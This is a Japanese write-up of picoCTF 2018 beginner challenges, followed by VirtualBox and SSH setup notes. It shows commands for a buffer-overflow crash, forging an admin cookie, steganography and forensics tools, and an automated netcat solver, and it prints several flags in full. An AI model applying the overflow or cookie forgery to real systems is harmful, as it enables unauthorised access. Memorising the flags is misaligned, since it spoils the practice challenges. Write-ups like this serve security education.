grep 2

上の方の"shell"っていうリンクからサーバには入れるらしい。

$ cd /problems/grep-2_3_826f886f547acb8a9c3fccb030e8168d/files
$ ls
files0 files1 files2 files3 file4 files5 files6 files7 files8 files9

ディレクトリがいっぱいあるのでとりあえずgrepしたら簡単に見つかった。

$ grep pico -r ./*
./files8/file14:picoCTF{...}

Aca-Shell-A

$ nc 2018shell.picoctf.com 58422
Sweet! We have gotten access into the system but we aren't root.
It's some sort of restricted shell! I can't see what you are typing
but I can see your output. I'll be here to help you along.
If you need help, type "echo 'Help Me!'" and I'll see what I can do
There is not much time left!
~/$ echo 'Help Me!'
Help Me!
You got this! Have you looked for any  directories?
~/$ ls
blackmail
executables
passwords
photos
secret
~/$ cd secret
Now we are cookin'! Take a look around there and tell me what you find!
~/secret$ ls
intel_1
intel_2
intel_3
intel_4
intel_5
profile_ahqueith5aekongieP4ahzugi
profile_ahShaighaxahMooshuP1johgo
profile_aik4hah9ilie9foru0Phoaph0
profile_AipieG5Ua9aewei5ieSoh7aph
profile_bah9Ech9oa4xaicohphahfaiG
profile_ie7sheiP7su2At2ahw6iRikoe
profile_of0Nee4laith8odaeLachoonu
profile_poh9eij4Choophaweiwev6eev
profile_poo3ipohGohThi9Cohverai7e
profile_Xei2uu5suwangohceedaifohs
Sabatoge them! Get rid of all their intel files!
~/secret$ rm intel*
Nice! Once they are all gone, I think I can drop you a file of an exploit!
Just type "echo 'Drop it in!' " and we can give it a whirl!
~/secret$ echo 'Drop it in!'
Drop it in!
I placed a file in the executables folder as it looks like the only place we can execute from!
Run the script I wrote to have a little more impact on the system!
~/secret$ cd ..
~/$ cd executables
~/executables$ ls
dontLookHere
~/executables$ ./dontLookHere               
 edea ced2 6120 5855 2084 b4e7 3122 e6e5 0b2c a938 bfb4 3f57 8322 9105 8c81 7676 f18c 7d2d ecbc f758 9fb3 1f5c aa42 5518 9556
 c2b1 86d5 22dc 879c 44a4 1280 ecbe b9a1 e18c a5cb 522d 3224 06d1 aee6 20ef 5257 4c15 7ab0 1c15 177c 6d76 d746 79dd 632c 929b
...
Looking through the text above, I think I have found the password. I am just having trouble with a username.
Oh drats! They are onto us! We could get kicked out soon!
Quick! Print the username to the screen so we can close are backdoor and log into the account directly!
You have to find another way other than echo!
~/executables$ whoami
l33th4x0r
Perfect! One second!
Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.
Try copying the file called TopSecret in tmp directory into the passwords folder.
~/executables$ cd ..             
~/$ cp /tmp/TopSecret passwords
Server shutdown in 10 seconds...
Quick! go read the file before we lose our connection!
~/$ cd passwords
~/passwords$ ls
TopSecret
~/passwords$ cat TopSecret
Major General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.
picoCTF{...}

Client Side is Still Bad

$ wget http://2018shell.picoctf.com:55790/ -O html
$ cat html

<html>
<head>
<title>Super Secure Log In</title>
</head>
<body bgcolor="#000000">
<!-- standard MD5 implementation -->
<script type="text/javascript" src="md5.js"></script>

<script type="text/javascript">
  function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(split*7, split*8) == '}') {
      if (checkpass.substring(split*6, split*7) == '...') {
        if (checkpass.substring(split*5, split*6) == '...') {
         if (checkpass.substring(split*4, split*5) == '...') {
          if (checkpass.substring(split*3, split*4) == '...') {
            if (checkpass.substring(split*2, split*3) == '...') {
              if (checkpass.substring(split, split*2) == 'CTF{') {
                if (checkpass.substring(0,split) == 'pico') {
                  alert("You got the flag!")
                  }
                }
              }
      
            }
          }
        }
      }
    }
    else {
      alert("Incorrect password");
    }
  }
</script>
<div style="position:relative; padding:5px;top:50px; left:38%; width:350px; height:140px; background-color:red">
<div style="text-align:center">
<p>Welcome to the Secure Login Server.</p>
<p>Please enter your credentials to proceed</p>
<form action="index.html" method="post">
<input type="password" id="pass" size="8" />
<br/>
<input type="submit" value="Log in" onclick="verify(); return false;" />
</form>
</div>
</div>
</body>
</html>

verify()内で正解文字列と比較している

Desrouleaux

$ nc 2018shell.picoctf.com 10493
You'll need to consult the file `incidents.json` to answer the following questions.


What is the most common source IP address? If there is more than one IP address that is the most common, you may give any of the most common ones.

How many unique destination IP addresses were targeted by the source IP address 189.229.254.207?

What is the number of unique destination ips a file is sent, on average? Needs to be correct to 2 decimal places.

incidents.jsonに関する質問が3つ出てくる。2つめの質問はランダムにソースIPが指定されるっぽい。
めんどいのでてきとーに解かせる。

import socket
import re
import json

HOSTNAME = "2018shell.picoctf.com"
PORTNUM = 10493
 
class Netcat:
    """ Python 'netcat like' module """
    def __init__(self, ip, port):
        self.buff = ""
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((ip, port))
    def read(self, length = 1024):
        """ Read 1024 bytes off the socket """
        return self.socket.recv(length).decode()
    def read_until(self, data):
        """ Read data into the buffer until we have data """
        while not data in self.buff:
            self.buff += self.socket.recv(1024).decode()
        pos = self.buff.find(data)
        rval = self.buff[:pos + len(data)]
        self.buff = self.buff[pos + len(data):]
        return rval
    def write(self, data):
        self.socket.send(data.encode())
    def close(self):
        self.socket.close()

FILEPATH = "incidents.json"
with open(FILEPATH) as f:
    buf = f.read()
json_dict = json.loads(buf)

ticket_num_by_src = {}
for t in json_dict["tickets"]:
    if t["src_ip"] in ticket_num_by_src:
        ticket_num_by_src[t["src_ip"]] += 1
    else:
        ticket_num_by_src[t["src_ip"]] = 1
sorted(ticket_num_by_src.items(), key=lambda x: x[1])

unique_dst_by_file = {}
for t in json_dict["tickets"]:
    if t["file_hash"] in unique_dst_by_file:
        if t["dst_ip"] not in unique_dst_by_file[t["file_hash"]]:
            unique_dst_by_file[t["file_hash"]] += [t["dst_ip"]]
    else:
        unique_dst_by_file[t["file_hash"]] = [t["dst_ip"]]
cnt = 0
for v in unique_dst_by_file.values():
    cnt += len(v)
avg_unique_dst_ip = cnt/len(unique_dst_by_file)

nc = Netcat(HOSTNAME, PORTNUM)

# You'll need to consult the file `incidents.json` to answer the following questions.
#
# What is the most common source IP address? If there is more than one IP address that is the most common, you may give any of the most common ones.
msg = nc.read_until('you may give any of the most common ones.')
nc.write(list(ticket_num_by_src.keys())[0] + "\n")

# How many unique destination IP addresses were targeted by the source IP address 189.229.254.207?
msg = nc.read_until('by the source IP address ')
expr = nc.read_until('?')
m = re.match(r'(\d+\.\d+\.\d+\.\d+)', expr)
src_ipaddr = m.group(1)
nc.write(str(ticket_num_by_src[src_ipaddr]) + "\n")

# What is the number of unique destination ips a file is sent, on average? Needs to be correct to 2 decimal places.
msg = nc.read_until('Needs to be correct to 2 decimal places.')
nc.write("{:.2f}".format(avg_unique_dst_ip) + "\n")
print(nc.read())

nc.close()

Netcatクラスは、以下を参照してほぼコピペ。
CTF4b 2018 writeup - しばイヌとお茶
Python Netcat · GitHub
※ただし、byte列のencode/decodeのみ追加。

$ python3 solver.py 
Correct!


Great job. You've earned the flag: picoCTF{...}

Logon

とりあえずURLにアクセスしてみると、ログインフォームがある。よくわからんのでとりあえず"Sign in"を押してみると以下のようなレスポンス。

HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://2018shell.picoctf.com:37861/flag
Set-Cookie: password=; Path=/
Set-Cookie: username=; Path=/
Set-Cookie: admin=False; Path=/

そして、遷移先には"No flag for you"と表示されている。
どうみてもcookieがあやしいのでadmin=Trueにしてさいどアクセスしてみると・・・
今度は無事にフラグが表示された。めでたしめでたし。

Reading Between the Eyes

$ sudo apt-get install ruby
$ sudo gem install zsteg
$ zsteg husky.png 
b1,r,lsb,xy         .. text: "^5>c[rvyzrf@"
b1,rgb,lsb,xy       .. text: "picoCTF{...}"
b1,abgr,msb,xy      .. file: PGP\011Secret Sub-key -
b2,g,msb,xy         .. text: "ADTU@PEPA"
b3,abgr,msb,xy      .. text: "t@Wv!Wt\tGtA"
b4,r,msb,xy         .. text: "0Tt7F3Saf"
b4,g,msb,xy         .. text: "2g'uV `3"
b4,b,lsb,xy         .. text: "##3\"TC%\"2f"
b4,b,msb,xy         .. text: " uvb&b@f!"
b4,rgb,lsb,xy       .. text: "1C5\"RdWD"
b4,rgb,msb,xy       .. text: "T E2d##B#VuQ`"
b4,bgr,lsb,xy       .. text: "A%2RTdGG"
b4,bgr,msb,xy       .. text: "EPD%4\"c\"#CUVqa "
b4,rgba,lsb,xy      .. text: "?5/%/d_tO"
b4,abgr,msb,xy      .. text: "EO%O#/c/2/C_e_q"

Recovering From the Snap

$ foremost -v animals.dd 
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Wed Feb  6 23:08:35 2019
Invocation: foremost -v animals.dd 
Output directory: /home/kanekkie/Documents/ctf/pico/Recovering_From_the_Snap/output
Configuration file: /etc/foremost.conf
Processing: animals.dd
|------------------------------------------------------------------
File: animals.dd
Start: Wed Feb  6 23:08:35 2019
Length: 10 MB (10485760 bytes)
 
Num	 Name (bs=512)	       Size	 File Offset	 Comment 

0:	00000077.jpg 	     617 KB 	      39424 	 
1:	00001313.jpg 	     481 KB 	     672256 	 
2:	00002277.jpg 	     380 KB 	    1165824 	 
3:	00003041.jpg 	     248 KB 	    1556992 	 
4:	00003541.jpg 	     314 KB 	    1812992 	 
5:	00004173.jpg 	     458 KB 	    2136576 	 
6:	00005093.jpg 	     383 KB 	    2607616 	 
7:	00005861.jpg 	      39 KB 	    3000832 	 
*|
Finish: Wed Feb  6 23:08:36 2019

8 FILES EXTRACTED
	
jpg:= 8
------------------------------------------------------------------

Foremost finished at Wed Feb  6 23:08:36 2019

あとはjpgを見ればフラグがある。
foremost便利ですね

admin panel

$ wget --no-check-certificate https://2018shell.picoctf.com/static/ee6ed2afe1da153ae06e61d5ee26d52d/data.pcap
$ grep pico data.pcap 
バイナリファイル data.pcap に一致しました
$ grep --binary-files=text pico data.pcap
user=admin&password=picoCTF{...}�zB[�ABB
                                                        )y��
                                                            )�E4�@@��������P�~.[��29��~

とりあえずgrepしてみたら見つかった

assembly-0

asm0(0xc9,0xb0) の返り値がフラグ（picoCTF{}の形式じゃなく、"0x.."）
アセンブリが配られてるので読むだけ。

$ cat intro_asm_rev.S 
.intel_syntax noprefix
.bits 32
	
.global asm0

asm0:
	push	ebp
	mov	ebp,esp
	mov	eax,DWORD PTR [ebp+0x8]
	mov	ebx,DWORD PTR [ebp+0xc]
	mov	eax,ebx
	mov	esp,ebp
	pop	ebp	
	ret

buffer overflow 0

ソースコードが配られるのでながめてみる。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
  fprintf(stderr, "%s\n", flag);
  fflush(stderr);
  exit(1);
}

void vuln(char *input){
  char buf[16];
  strcpy(buf, input);
}

int main(int argc, char **argv){
  
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler);
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  
  if (argc > 1) {
    vuln(argv[1]);
    printf("Thanks! Received: %s", argv[1]);
  }
  else
    printf("This program takes 1 argument.\n");
  return 0;
}

SEGVのハンドラ（sigsegv_handler）に到達するとflagが表示されるっぽい。
どこでSEGVを出すかだが、（名前からしても）vulnだろう。
char buf[16]にargv[1]が入るので、長い引数を渡せばよさそう。

kanekkie@pico-2018-shell:~$ cd /problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17       
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 23' | xargs
 ./vuln
Thanks! Received: 00000000000000000000000
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 24' | xargs
 ./vuln                                                                                                                    
xargs: ./vuln: terminated by signal 11                                                                                     
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 25' | xargs
 ./vuln                                                                                                                    
xargs: ./vuln: terminated by signal 11                                                                                     
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 26' | xargs
 ./vuln                                                                                                                    
xargs: ./vuln: terminated by signal 11                                                                                     
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 27' | xargs
 ./vuln                                                                                                                    
xargs: ./vuln: terminated by signal 11                                                                                     
kanekkie@pico-2018-shell:/problems/buffer-overflow-0_3_d5263c5219b334339c34ac35c51c4a17$ python -c 'print "0" * 28' | xargs
 ./vuln                                                                                                                    
picoCTF{...}                                                                                 

24文字からsignal 11 (SEGV?) が出て、28文字でフラグが表示された。

caesar cipher 1

$ cat ciphertext 
picoCTF{vgefmsaapaxpomqemdoubtqdxoaxypeo}

よくわからないのでとりあえずROT0-25を出してみる。

CT_PATH = "ciphertext"

# only for small letters
def rotn(t, n):
    return "".join([chr((ord(c) - ord("a") + n) % 26 + ord("a")) for c in t])

with open(CT_PATH) as f:
    ct = f.read()

for i in range(26):
    print("ROT {:2d}: {}{}{}".format(i, ct[:8], rotn(ct[8:-1], i), ct[-1:]))

$ python3 caesar_cipher_1.py 
ROT  0: picoCTF{vgefmsaapaxpomqemdoubtqdxoaxypeo}
ROT  1: picoCTF{whfgntbbqbyqpnrfnepvcureypbyzqfp}
ROT  2: picoCTF{xighouccrczrqosgofqwdvsfzqczargq}
ROT  3: picoCTF{yjhipvddsdasrpthpgrxewtgardabshr}
ROT  4: picoCTF{zkijqweetebtsquiqhsyfxuhbsebctis}
ROT  5: picoCTF{aljkrxffufcutrvjritzgyvictfcdujt}
ROT  6: picoCTF{bmklsyggvgdvuswksjuahzwjdugdevku}
ROT  7: picoCTF{cnlmtzhhwhewvtxltkvbiaxkevhefwlv}
ROT  8: picoCTF{domnuaiixifxwuymulwcjbylfwifgxmw}
ROT  9: picoCTF{epnovbjjyjgyxvznvmxdkczmgxjghynx}
ROT 10: picoCTF{fqopwckkzkhzywaownyeldanhykhizoy}
ROT 11: picoCTF{grpqxdllaliazxbpxozfmeboizlijapz}
ROT 12: picoCTF{hsqryemmbmjbaycqypagnfcpjamjkbqa}
ROT 13: picoCTF{itrszfnncnkcbzdrzqbhogdqkbnklcrb}
ROT 14: picoCTF{justagoodoldcaesarcipherlcolmdsc}
ROT 15: picoCTF{kvtubhppepmedbftbsdjqifsmdpmnetd}
ROT 16: picoCTF{lwuvciqqfqnfecguctekrjgtneqnofue}
ROT 17: picoCTF{mxvwdjrrgrogfdhvduflskhuofropgvf}
ROT 18: picoCTF{nywxeksshsphgeiwevgmtlivpgspqhwg}
ROT 19: picoCTF{ozxyflttitqihfjxfwhnumjwqhtqrixh}
ROT 20: picoCTF{payzgmuujurjigkygxiovnkxriursjyi}
ROT 21: picoCTF{qbzahnvvkvskjhlzhyjpwolysjvstkzj}
ROT 22: picoCTF{rcabiowwlwtlkimaizkqxpmztkwtulak}
ROT 23: picoCTF{sdbcjpxxmxumljnbjalryqnaulxuvmbl}
ROT 24: picoCTF{tecdkqyynyvnmkockbmszrobvmyvwncm}
ROT 25: picoCTF{ufdelrzzozwonlpdlcntaspcwnzwxodn}

ROT14ぽい（でも確証はないのでguess問題ぽさもある。。）

environ

shell serverの環境変数からフラグを探す。

kanekkie@pico-2018-shell:~$ export | grep pico
declare -x SECRET_FLAG="picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}"

hertz

$ nc 2018shell.picoctf.com 48186 > output
$ cat output 
-------------------------------------------------------------------------------
qmvnfxwt oafa ht smkf ulxn - tkctwhwkwhmv_qhpoaft_xfa_tmlzxcla_oooohlwpww
-------------------------------------------------------------------------------
"jall, pfhvqa, tm navmx xvr lkqqx xfa vmj yktw uxdhls atwxwat mu woa
ckmvxpxfwat. ckw h jxfv smk, hu smk rmvw wall da woxw woht daxvt jxf,
hu smk twhll wfs wm rauavr woa hvuxdhat xvr omffmft pafpawfxwar cs woxw
xvwhqofhtw-h faxlls calhaza oa ht xvwhqofhtw-h jhll oxza vmwohvn
dmfa wm rm jhwo smk xvr smk xfa vm lmvnaf ds ufhavr, vm lmvnaf ds
'uxhwoukl tlxza,' xt smk qxll smkftalu! ckw omj rm smk rm? h taa h
oxza ufhnowavar smk-thw rmjv xvr wall da xll woa vajt."

hw jxt hv ykls, 1805, xvr woa tpaxiaf jxt woa jall-ivmjv xvvx pxzlmzvx
tqoafaf, dxhr mu omvmf xvr uxzmfhwa mu woa adpfatt dxfsx uarmfmzvx.
jhwo woata jmfrt toa nfaawar pfhvqa zxthlh ikfxnhv, x dxv mu ohno
fxvi xvr hdpmfwxvqa, jom jxt woa uhftw wm xffhza xw oaf faqapwhmv. xvvx
pzlmzvx oxr oxr x qmkno umf tmda rxst. toa jxt, xt toa txhr, tkuuafhvn
ufmd lx nfhppa; nfhppa cahvn woav x vaj jmfr hv tw. pawaftckfn, ktar
mvls cs woa alhwa.

xll oaf hvzhwxwhmvt jhwomkw abqapwhmv, jfhwwav hv ufavqo, xvr ralhzafar
cs x tqxflaw-lhzafhar ummwdxv woxw dmfvhvn, fxv xt umllmjt:

"hu smk oxza vmwohvn cawwaf wm rm, qmkvw (mf pfhvqa), xvr hu woa
pfmtpaqw mu tpavrhvn xv azavhvn jhwo x pmmf hvzxlhr ht vmw wmm waffhcla,
h toxll ca zafs qoxfdar wm taa smk wmvhnow cawjaav 7 xvr 10 xvvawwa
tqoafaf."

"oaxzavt! joxw x zhfklavw xwwxqi!" faplhar woa pfhvqa, vmw hv woa
laxtw rhtqmvqafwar cs woht faqapwhmv. oa oxr yktw avwafar, jaxfhvn xv
adcfmhrafar qmkfw kvhumfd, ivaa cfaaqoat, xvr tomat, xvr oxr twxft mv
oht cfaxtw xvr x tafava abpfatthmv mv oht ulxw uxqa. oa tpmia hv woxw
fauhvar ufavqo hv johqo mkf nfxvruxwoaft vmw mvls tpmia ckw womknow, xvr
jhwo woa navwla, pxwfmvhehvn hvwmvxwhmv vxwkfxl wm x dxv mu hdpmfwxvqa
jom oxr nfmjv mlr hv tmqhaws xvr xw qmkfw. oa javw kp wm xvvx pzlmzvx,
ihttar oaf oxvr, pfatavwhvn wm oaf oht cxlr, tqavwar, xvr tohvhvn oaxr,
xvr qmdplxqavwls taxwar ohdtalu mv woa tmux.

"uhftw mu xll, raxf ufhavr, wall da omj smk xfa. taw smkf ufhavr't
dhvr xw fatw," txhr oa jhwomkw xlwafhvn oht wmva, cavaxwo woa
pmlhwavatt xvr xuuaqwar tsdpxwos mu johqo hvrhuuafavqa xvr azav hfmvs
qmklr ca rhtqafvar.

よくわからないけど、substitution cipherだと問題に書いてあったので、オンラインのソルバに投げてみたら解けた。
Substitution Solver - www.guballa.de
換字表は

abcdefghijklmnopqrstuvwxyz     This clear text ...
kdpoqhscgjzmtbnlyfxwueiavr     ... maps to this cipher text

hex editor

$ strings hex_editor.jpg | grep pico
Your flag is: "picoCTF{and_thats_how_u_edit_hex_kittos_8BcA67a2}"

バイナリエディタいらなかった。。

ssh-keyz

web shellから.ssh/authorized_keysに公開鍵を書き込んでsshするだけ。

$ ssh kanekkie@2018shell4.picoctf.com
The authenticity of host '2018shell4.picoctf.com (18.188.57.214)' can't be established.
ECDSA key fingerprint is SHA256:cLYL/h/zTqqapwkOtHLvuBv/ire4/UakBVvpUpBNqII.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '2018shell4.picoctf.com,18.188.57.214' (ECDSA) to the list of known hosts.
picoCTF{who_n33ds_p4ssw0rds_38dj21}
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1075-aws x86_64)
...

ようやく150点問題おしまい。。

Virtualboxの設定

1. [グローバルツール] > [ホストネットワークマネージャー] からホストオンリーアダプタを作成
2. 仮想マシンの設定でネットワークにアダプタを追加（仮想マシンが起動してると設定できない）
3. 仮想マシン起動

Ubuntuのsshdを設定

$ sudo apt-get install openssh-server
$ sudo vi /etc/ssh/sshd_config
## "PermitRootLogin no"を追記
$ sudo /etc/init.d/ssh restart

ホストからsshでログイン

$ ssh USERNAME@HOSTNAME

公開鍵の設定

## Windows Powershell
> ssh-keygen -t ecdsa
> scp $HOME\.ssh\id_ecdsa.pub USERNAME@HOSTNAME:~/.ssh/authorized_keys
> ssh USERNAME@HOSTNAME
$ sudo vi /etc/ssh/sshd_config
## "PasswordAuthentication no"
$ sudo /etc/init.d/ssh restart

Virtual Studio Codeからssh接続する場合

SSH FSを入れ、以下のコマンドで設定

>SSH FS: Create a SSH FS configuration

適当に編集する

// If you haven't already, associate .jsonc files with "JSON with Comments (jsonc)
{
    "root": "~/",
    "host": "HOSTNAME",
    "port": 22,
    "username": "USERNAME",
    "privateKeyPath": "$USERPROFILE/.ssh/id_ecdsa"
}